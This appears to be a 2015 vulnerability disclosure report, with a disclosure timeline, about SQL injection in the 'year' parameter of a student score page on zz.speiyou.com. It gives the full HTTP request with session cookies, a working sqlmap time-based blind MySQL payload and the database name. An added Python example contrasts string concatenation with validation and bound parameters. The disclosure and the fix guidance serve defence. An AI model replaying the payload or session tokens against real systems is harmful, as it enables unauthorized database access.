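2015-07-08: Details reported to the vendor; awaiting vendor handling
2015-07-09: Vendor confirmed; details disclosed to the vendor only
2015-07-19: Details disclosed to core white hats and experts in related fields
2015-07-29: Details disclosed to regular white hats
2015-08-08: Details disclosed to intern white hats
2015-08-23: Details disclosed to the public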
Injection:
POST /Students/getScore/ HTTP/1.1
Host: zz.speiyou.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://zz.speiyou.com/Students/getScore/
Cookie: CAKEPHP=jv6johj4hvkejopht9u1qfema0; lastact=http%3A%2F%2Fzz.speiyou.com%2FUsers%2FcompleteInfo%2F; BIGipServerPY_Web-YouHua_Pool=1846257856.20480.0000; jfs=http%3A%2F%2Fzz.speiyou.com%2Fhomes%3Ftk%3DZUdWekxXVm5aakZtWm5NeWIyeDJZbXc0T0hCak9HNTFNek15TUhJMQ; Hm_lvt_7140e3d0654bb622b1e162589f9e278c=1436275347; Hm_lpvt_7140e3d0654bb622b1e162589f9e278c=1436276354; XESCAS[tk]=ZUdWekxXVm5aakZtWm5NeWIyeDJZbXc0T0hCak9HNTFNek15TUhJMQ; stoken=ZUdWekxXVm5aakZtWm5NeWIyeDJZbXc0T0hCak9HNTFNek15TUhJMQ; CakeCookie[XESCAS][Cas]=W%19%D8Xth%E6q%B3%A4%90E%1D%80%B5%07%18%17%2C%94C%AD%60%10%C7s%E9%E6%22%AB%1B%24yC%F9%28%27%F8%16%8F%85R%FC%CF%E4%DDM+%F1%0D%D7h+%D0%D46%2A%82%E0%CAI%E84%FF%EAF%BC%16%28_%92p%8D%CA%0B%14%23%E9dX%0B%B5%17%A1%F3%8D%93%8B%C1g%9BmG%7C%97%16%CE%DE_%8FG%FAi5%7B%B0%22%98%3FV_%B7%C4%07R%D5%C6cb%5Cz%94e%08%D2%10%40%16%8D%0B%F8u%26%1C%92%AE%A7%ED%DE%3B%18%8D%E0d; newstoken=ZUdWekxXVm5aakZtWm5NeWIyeDJZbXc0T0hCak9HNTFNek15TUhJMQ; __utma=190819817.287472353.1436276128.1436276128.1436276128.1; __utmb=190819817.2.10.1436276128; __utmc=190819817; __utmz=190819817.1436276128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; Hm_lvt_b0a8166882e17ab0eb76cbb036d7ffd8=1436276128; Hm_lpvt_b0a8166882e17ab0eb76cbb036d7ffd8=1436276130; indexGradeType=gaozhong; indexGrade=10; indexSubject=ff80808127d77caa0127d7e10f1c00c4; looyu_id=5d3a668cd242b8126a2601c28d8eb1e256_31691%3A1; B_cookie_login_status=ok
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

year=2015&grade=&subject=&recommend=1&paperName=1111&button=%E6%9F%A5%E8%AF%A2
Parameter: year
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: year (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: year=2015' AND (SELECT * FROM (SELECT(SLEEP(5)))UNfm) AND 'rYiJ'='rYiJ&grade=&subject=&recommend=1&paperName=1111&button=%E6%9F%A5%E8%AF%A2
---
back-end DBMS: MySQL 5.0.12
current database: 'py_rxcs'
Filter the relevant parameters.
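One way to apply that fix to the `year` parameter, as an added example that is not part of the original report or the vendor's code: an allow-list check on the value plus a bound query parameter, shown beside the string-concatenation pattern that produces this kind of finding. The in-memory SQLite table stands in for the MySQL back end, and the table, column and function names are hypothetical.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Request bodies taken from the report: the normal form post and the sqlmap payload.
OK_BODY = "year=2015&grade=&subject=&recommend=1&paperName=1111&button=%E6%9F%A5%E8%AF%A2"
PAYLOAD = "2015' AND (SELECT * FROM (SELECT(SLEEP(5)))UNfm) AND 'rYiJ'='rYiJ"
BAD_BODY = "year=" + PAYLOAD + "&grade=&subject=&recommend=1&paperName=1111"

YEAR_RE = re.compile(r"[0-9]{4}")


def make_db():
    """Constructed stand-in table; the real schema is not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE scores (year TEXT, paper_name TEXT, score INTEGER)")
    db.execute("INSERT INTO scores VALUES ('2015', '1111', 92)")
    return db


def parse_year(body):
    """Allow-list check: exactly one `year` field, exactly four ASCII digits."""
    values = parse_qs(body, keep_blank_values=True).get("year", [])
    if len(values) != 1 or not YEAR_RE.fullmatch(values[0]):
        raise ValueError("invalid year")
    return values[0]


def unsafe_sql(year):
    """Vulnerable pattern: the value is concatenated into the statement text."""
    return "SELECT score FROM scores WHERE year = '" + year + "'"


def get_scores_bound_only(db, year):
    """Binding alone: an unvalidated value is compared as data, never parsed as SQL."""
    return db.execute("SELECT score FROM scores WHERE year = ?", (year,)).fetchall()


def get_scores(db, body):
    """Hardened handler: validate first, then bind."""
    return get_scores_bound_only(db, parse_year(body))


if __name__ == "__main__":
    db = make_db()
    print(unsafe_sql(PAYLOAD))                 # quote breaks out of the literal
    print(get_scores(db, OK_BODY))             # normal request still works
    print(get_scores_bound_only(db, PAYLOAD))  # payload matches no row
    try:
        get_scores(db, BAD_BODY)
    except ValueError as exc:
        print("rejected:", exc)
```

Validation gives an early, loggable rejection; the bound parameter is what removes the injection, so the same binding applies to `grade`, `subject`, `recommend` and `paperName`.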
Severity: High
Vulnerability Rank: 15
Confirmation time: 2015-07-09 19:17
Thank you, the fix is in progress.
None yet.